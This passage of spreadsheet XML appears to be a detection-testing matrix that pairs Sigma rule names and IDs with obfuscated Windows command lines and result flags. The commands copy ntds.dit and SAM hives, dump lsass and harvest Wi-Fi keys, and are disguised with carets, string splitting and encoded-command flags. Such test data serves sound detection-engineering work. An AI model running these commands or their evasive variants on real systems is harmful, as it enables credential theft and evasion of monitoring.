          <t>40b19fa6-d835-400c-b301-41f3a2baacaf</t>
        </is>
      </c>
      <c r="E32" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "set part1=HarddiskVolume &amp;&amp; set part2=ShadowCopy &amp;&amp; call mklink /D C:\temp\vss \\?\GLOBALROOT\Device\%part1%%part2%1"</t>
        </is>
      </c>
      <c r="F32" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G32" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H32" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I32" s="44" t="n"/>
      <c r="J32" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K32" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="33" ht="15.75" customHeight="1" s="42">
      <c r="A33" s="43" t="n"/>
      <c r="B33" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_sensitive_file_copy</t>
        </is>
      </c>
      <c r="C33" s="44" t="inlineStr">
        <is>
          <t>Copying Sensitive Files with Credential Data</t>
        </is>
      </c>
      <c r="D33" s="44" t="inlineStr">
        <is>
          <t>e7be6119-fc37-43f0-ad4f-1f3f99be2f9f</t>
        </is>
      </c>
      <c r="E33" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Windows\ntds &amp;&amp; esentutl.exe ,/y,ntds.dit C:\temp\ntds.bak"</t>
        </is>
      </c>
      <c r="F33" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G33" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H33" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I33" s="43" t="n"/>
      <c r="J33" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K33" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="34" ht="15.75" customHeight="1" s="42">
      <c r="A34" s="43" t="n"/>
      <c r="B34" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_pypykatz</t>
        </is>
      </c>
      <c r="C34" s="44" t="inlineStr">
        <is>
          <t>HackTool - Pypykatz Credentials Dumping Activity</t>
        </is>
      </c>
      <c r="D34" s="44" t="inlineStr">
        <is>
          <t>a29808fd-ef50-49ff-9c7a-59a9b040b404</t>
        </is>
      </c>
      <c r="E34" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "pypykatz l^ive reg^istry"</t>
        </is>
      </c>
      <c r="F34" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G34" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H34" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I34" s="43" t="n"/>
      <c r="J34" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K34" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="35" ht="15.75" customHeight="1" s="42">
      <c r="A35" s="43" t="n"/>
      <c r="B35" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_quarks_pwdump</t>
        </is>
      </c>
      <c r="C35" s="44" t="inlineStr">
        <is>
          <t>HackTool - Quarks PwDump Execution</t>
        </is>
      </c>
      <c r="D35" s="44" t="inlineStr">
        <is>
          <t>0685b176-c816-4837-8e7b-1216f346636b</t>
        </is>
      </c>
      <c r="E35" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\temp\sys_update.exe --dump-ha^sh-local"</t>
        </is>
      </c>
      <c r="F35" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G35" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H35" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I35" s="43" t="n"/>
      <c r="J35" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K35" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="36" ht="15.75" customHeight="1" s="42">
      <c r="A36" s="43" t="n"/>
      <c r="B36" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_sam_access</t>
        </is>
      </c>
      <c r="C36" s="44" t="inlineStr">
        <is>
          <t>PowerShell SAM Copy</t>
        </is>
      </c>
      <c r="D36" s="44" t="inlineStr">
        <is>
          <t>1af57a4b-460a-4738-9034-db68b880c665</t>
        </is>
      </c>
      <c r="E36" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "$src='\HarddiskVolumeShadow'+'Copy1\Windows\System32\config\s'+'am'; Copy-Item $src C:\temp\sam"</t>
        </is>
      </c>
      <c r="F36" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G36" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H36" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I36" s="43" t="n"/>
      <c r="J36" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K36" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="37" ht="15.75" customHeight="1" s="42">
      <c r="A37" s="43" t="n"/>
      <c r="B37" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_sam_access</t>
        </is>
      </c>
      <c r="C37" s="44" t="inlineStr">
        <is>
          <t>PowerShell SAM Copy</t>
        </is>
      </c>
      <c r="D37" s="44" t="inlineStr">
        <is>
          <t>1af57a4b-460a-4738-9034-db68b880c665</t>
        </is>
      </c>
      <c r="E37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37" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G37" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H37" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I37" s="43" t="n"/>
      <c r="J37" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K37" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="38" ht="15.75" customHeight="1" s="42">
      <c r="A38" s="43" t="n"/>
      <c r="B38" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_sam_access</t>
        </is>
      </c>
      <c r="C38" s="44" t="inlineStr">
        <is>
          <t>PowerShell SAM Copy</t>
        </is>
      </c>
      <c r="D38" s="44" t="inlineStr">
        <is>
          <t>1af57a4b-460a-4738-9034-db68b880c665</t>
        </is>
      </c>
      <c r="E38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38" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G38" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H38" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I38" s="43" t="n"/>
      <c r="J38" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K38" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="39" ht="15.75" customHeight="1" s="42">
      <c r="A39" s="43" t="n"/>
      <c r="B39" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_sam_access</t>
        </is>
      </c>
      <c r="C39" s="44" t="inlineStr">
        <is>
          <t>PowerShell SAM Copy</t>
        </is>
      </c>
      <c r="D39" s="44" t="inlineStr">
        <is>
          <t>1af57a4b-460a-4738-9034-db68b880c665</t>
        </is>
      </c>
      <c r="E39" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"EncodedCommand"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39" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G39" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H39" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I39" s="43" t="n"/>
      <c r="J39" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K39" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="40" ht="15.75" customHeight="1" s="42">
      <c r="A40" s="43" t="n"/>
      <c r="B40" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_sam_access</t>
        </is>
      </c>
      <c r="C40" s="44" t="inlineStr">
        <is>
          <t>PowerShell SAM Copy</t>
        </is>
      </c>
      <c r="D40" s="44" t="inlineStr">
        <is>
          <t>1af57a4b-460a-4738-9034-db68b880c665</t>
        </is>
      </c>
      <c r="E40" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -enc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0" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G40" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H40" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I40" s="43" t="n"/>
      <c r="J40" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K40" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="41" ht="15.75" customHeight="1" s="42">
      <c r="A41" s="43" t="n"/>
      <c r="B41" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_sam_access</t>
        </is>
      </c>
      <c r="C41" s="44" t="inlineStr">
        <is>
          <t>PowerShell SAM Copy</t>
        </is>
      </c>
      <c r="D41" s="44" t="inlineStr">
        <is>
          <t>1af57a4b-460a-4738-9034-db68b880c665</t>
        </is>
      </c>
      <c r="E41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1" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G41" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H41" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I41" s="43" t="n"/>
      <c r="J41" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K41" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="42" ht="15.75" customHeight="1" s="42">
      <c r="A42" s="43" t="n"/>
      <c r="B42" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_sam_access</t>
        </is>
      </c>
      <c r="C42" s="44" t="inlineStr">
        <is>
          <t>PowerShell SAM Copy</t>
        </is>
      </c>
      <c r="D42" s="44" t="inlineStr">
        <is>
          <t>1af57a4b-460a-4738-9034-db68b880c665</t>
        </is>
      </c>
      <c r="E42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2" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G42" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H42" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I42" s="43" t="n"/>
      <c r="J42" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K42" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="43" ht="15.75" customHeight="1" s="42">
      <c r="A43" s="43" t="n"/>
      <c r="B43" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_sam_access</t>
        </is>
      </c>
      <c r="C43" s="44" t="inlineStr">
        <is>
          <t>PowerShell SAM Copy</t>
        </is>
      </c>
      <c r="D43" s="44" t="inlineStr">
        <is>
          <t>1af57a4b-460a-4738-9034-db68b880c665</t>
        </is>
      </c>
      <c r="E43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3" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G43" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H43" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I43" s="43" t="n"/>
      <c r="J43" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K43" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="44" ht="15.75" customHeight="1" s="42">
      <c r="A44" s="43" t="n"/>
      <c r="B44" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_sam_access</t>
        </is>
      </c>
      <c r="C44" s="44" t="inlineStr">
        <is>
          <t>PowerShell SAM Copy</t>
        </is>
      </c>
      <c r="D44" s="44" t="inlineStr">
        <is>
          <t>1af57a4b-460a-4738-9034-db68b880c665</t>
        </is>
      </c>
      <c r="E44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4" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G44" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H44" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I44" s="43" t="n"/>
      <c r="J44" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K44" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="45" ht="15.75" customHeight="1" s="42">
      <c r="A45" s="43" t="n"/>
      <c r="B45" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_sam_access</t>
        </is>
      </c>
      <c r="C45" s="44" t="inlineStr">
        <is>
          <t>PowerShell SAM Copy</t>
        </is>
      </c>
      <c r="D45" s="44" t="inlineStr">
        <is>
          <t>1af57a4b-460a-4738-9034-db68b880c665</t>
        </is>
      </c>
      <c r="E45" s="44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5" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G45" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H45" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I45" s="43" t="n"/>
      <c r="J45" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K45" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="46" ht="15.75" customHeight="1" s="42">
      <c r="A46" s="43" t="n"/>
      <c r="B46" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_sam_access</t>
        </is>
      </c>
      <c r="C46" s="44" t="inlineStr">
        <is>
          <t>PowerShell SAM Copy</t>
        </is>
      </c>
      <c r="D46" s="44" t="inlineStr">
        <is>
          <t>1af57a4b-460a-4738-9034-db68b880c665</t>
        </is>
      </c>
      <c r="E46" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand"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46" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G46" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H46" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I46" s="43" t="n"/>
      <c r="J46" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K46" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="47" ht="15.75" customHeight="1" s="42">
      <c r="A47" s="43" t="inlineStr">
        <is>
          <t>t1003.003</t>
        </is>
      </c>
      <c r="B47" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_mklink_shadow_copies_access_symlink</t>
        </is>
      </c>
      <c r="C47" s="44" t="inlineStr">
        <is>
          <t>VolumeShadowCopy Symlink Creation Via Mklink</t>
        </is>
      </c>
      <c r="D47" s="44" t="inlineStr">
        <is>
          <t>40b19fa6-d835-400c-b301-41f3a2baacaf</t>
        </is>
      </c>
      <c r="E47" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "set part1=HarddiskVolume &amp;&amp; set part2=ShadowCopy &amp;&amp; call mklink /D C:\temp\vss \\?\GLOBALROOT\Device\%part1%%part2%1"</t>
        </is>
      </c>
      <c r="F47" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G47" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H47" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I47" s="44" t="n"/>
      <c r="J47" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K47" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="48" ht="15.75" customHeight="1" s="42">
      <c r="A48" s="43" t="inlineStr">
        <is>
          <t>t1003.003</t>
        </is>
      </c>
      <c r="B48" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_mklink_shadow_copies_access_symlink</t>
        </is>
      </c>
      <c r="C48" s="44" t="inlineStr">
        <is>
          <t>VolumeShadowCopy Symlink Creation Via Mklink</t>
        </is>
      </c>
      <c r="D48" s="44" t="inlineStr">
        <is>
          <t>40b19fa6-d835-400c-b301-41f3a2baacaf</t>
        </is>
      </c>
      <c r="E48" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "New-Item -ItemType SymbolicLink -Path C:\temp\vss_link -Target \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1"</t>
        </is>
      </c>
      <c r="F48" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G48" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H48" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I48" s="44" t="n"/>
      <c r="J48" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K48" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="49" ht="15.75" customHeight="1" s="42">
      <c r="A49" s="43" t="n"/>
      <c r="B49" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_sensitive_file_copy</t>
        </is>
      </c>
      <c r="C49" s="44" t="inlineStr">
        <is>
          <t>Copying Sensitive Files with Credential Data</t>
        </is>
      </c>
      <c r="D49" s="44" t="inlineStr">
        <is>
          <t>e7be6119-fc37-43f0-ad4f-1f3f99be2f9f</t>
        </is>
      </c>
      <c r="E49" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Windows\ntds &amp;&amp; esentutl.exe ,/y,ntds.dit C:\temp\ntds.bak"</t>
        </is>
      </c>
      <c r="F49" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G49" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H49" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I49" s="44" t="n"/>
      <c r="J49" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K49" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="50" ht="15.75" customHeight="1" s="42">
      <c r="A50" s="43" t="n"/>
      <c r="B50" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_ntdsutil_susp_usage</t>
        </is>
      </c>
      <c r="C50" s="44" t="inlineStr">
        <is>
          <t>Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)</t>
        </is>
      </c>
      <c r="D50" s="44" t="inlineStr">
        <is>
          <t>a58353df-af43-4753-bad0-cd83ef35eef5</t>
        </is>
      </c>
      <c r="E50" s="44" t="inlineStr">
        <is>
          <t>echo snapshot "mount c2b3e2c6-1ffb-4625-ba8e-3503c27a9fcb" quit quit | ntdsutil.exe</t>
        </is>
      </c>
      <c r="F50" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G50" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H50" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I50" s="43" t="n"/>
      <c r="J50" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K50" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="51" ht="15.75" customHeight="1" s="42">
      <c r="A51" s="43" t="n"/>
      <c r="B51" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_ntds</t>
        </is>
      </c>
      <c r="C51" s="44" t="inlineStr">
        <is>
          <t>Suspicious Process Patterns NTDS.DIT Exfil</t>
        </is>
      </c>
      <c r="D51" s="44" t="inlineStr">
        <is>
          <t>8bc64091-6875-4881-aaf9-7bd25b5dda08</t>
        </is>
      </c>
      <c r="E51" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Copy-Item ('C:\Windows\NTDS\nt' + 'ds.dit') -Destination 'C:\exfil\data.bin'"</t>
        </is>
      </c>
      <c r="F51" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G51" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H51" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I51" s="43" t="n"/>
      <c r="J51" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K51" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="52" ht="15.75" customHeight="1" s="42">
      <c r="A52" s="43" t="n"/>
      <c r="B52" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_shadow_copies_creation</t>
        </is>
      </c>
      <c r="C52" s="44" t="inlineStr">
        <is>
          <t>Shadow Copies Creation Using Operating Systems Utilities</t>
        </is>
      </c>
      <c r="D52" s="44" t="inlineStr">
        <is>
          <t>b17ea6f7-6e90-447e-a799-e6c0a493d6ce</t>
        </is>
      </c>
      <c r="E52" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Invoke-WmiMethod -Class ('Win32_Shad' + 'owCopy') -Name ('Cre' + 'ate') -ArgumentList 'C:\'"</t>
        </is>
      </c>
      <c r="F52" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G52" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H52" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I52" s="44" t="n"/>
      <c r="J52" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K52" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="53" ht="15.75" customHeight="1" s="42">
      <c r="A53" s="43" t="n"/>
      <c r="B53" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_shadow_copies_creation</t>
        </is>
      </c>
      <c r="C53" s="43" t="inlineStr">
        <is>
          <t>Shadow Copies Creation Using Operating Systems Utilities</t>
        </is>
      </c>
      <c r="D53" s="43" t="inlineStr">
        <is>
          <t>b17ea6f7-6e90-447e-a799-e6c0a493d6ce</t>
        </is>
      </c>
      <c r="E53" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Invoke-WmiMethod -Class ('Win32_Shad' + 'owCopy') -Name ('Cre' + 'ate') -ArgumentList 'C:\'"</t>
        </is>
      </c>
      <c r="F53" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G53" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H53" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I53" s="43" t="n"/>
      <c r="J53" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K53" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="54" ht="15.75" customHeight="1" s="42">
      <c r="A54" s="43" t="n"/>
      <c r="B54" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C54" s="44" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
      </c>
      <c r="D54" s="44" t="inlineStr">
        <is>
          <t>1a1ed54a-2ba4-4221-94d5-01dee560d71e</t>
        </is>
      </c>
      <c r="E54" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "malicious_dump.exe --full --name C:\temp\lsass.d^mp 756"</t>
        </is>
      </c>
      <c r="F54" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G54" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H54" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I54" s="43" t="n"/>
      <c r="J54" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K54" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="55" ht="15.75" customHeight="1" s="42">
      <c r="A55" s="43" t="n"/>
      <c r="B55" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C55" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D55" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E55" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Move-Item -Path .\lsass.exe_*.dmp -Destination C:\temp\dump.bin"</t>
        </is>
      </c>
      <c r="F55" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G55" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H55" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I55" s="44" t="n"/>
      <c r="J55" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K55" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="56" ht="15.75" customHeight="1" s="42">
      <c r="A56" s="43" t="n"/>
      <c r="B56" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C56" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D56" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E56" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Copy-Item .\procdump.exe -Destination .\sysdiag.exe"</t>
        </is>
      </c>
      <c r="F56" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G56" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H56" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I56" s="44" t="n"/>
      <c r="J56" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K56" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="57" ht="15.75" customHeight="1" s="42">
      <c r="A57" s="43" t="n"/>
      <c r="B57" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C57" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D57" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E57" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Move-Item -Path .\lsass.exe_220111_085234.dmp -Destination .\app_crash.log"</t>
        </is>
      </c>
      <c r="F57" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G57" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H57" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I57" s="44" t="n"/>
      <c r="J57" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K57" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="58" ht="15.75" customHeight="1" s="42">
      <c r="A58" s="43" t="n"/>
      <c r="B58" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C58" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D58" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E58" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Move-Item -Path .\lsass.exe_220111_085234.dmp -Destination .\app_crash.log"</t>
        </is>
      </c>
      <c r="F58" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G58" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H58" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I58" s="44" t="n"/>
      <c r="J58" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K58" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="59" ht="15.75" customHeight="1" s="42">
      <c r="A59" s="43" t="n"/>
      <c r="B59" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_wifi_credential_harvesting</t>
        </is>
      </c>
      <c r="C59" s="43" t="inlineStr">
        <is>
          <t>Harvesting Of Wifi Credentials Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D59" s="43" t="inlineStr">
        <is>
          <t>42b1a5b8-353f-4f10-b256-39de4467faff</t>
        </is>
      </c>
      <c r="E59" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "echo wlan show profile name=SSID key=clear | netsh.exe"</t>
        </is>
      </c>
      <c r="F59" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G59" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H59" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I59" s="43" t="n"/>
      <c r="J59" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K59" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="60" ht="15.75" customHeight="1" s="42">
      <c r="A60" s="44" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B60" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C60" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D60" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E60" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "W^in^P^wn.exe"</t>
        </is>
      </c>
      <c r="F60" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G60" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H60" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I60" s="43" t="n"/>
      <c r="J60" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K60" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="61" ht="15.75" customHeight="1" s="42">
      <c r="A61" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B61" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C61" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D61" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E61" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass /"file" C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F61" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G61" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H61" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I61" s="43" t="n"/>
      <c r="J61" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K61" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="62" ht="15.75" customHeight="1" s="42">
      <c r="A62" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B62" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C62" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D62" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E62" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ep" bypass -FILE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F62" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G62" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H62" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I62" s="43" t="n"/>
      <c r="J62" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K62" s="44" t="b">
        <v>0</v>
      </c>
    </row>
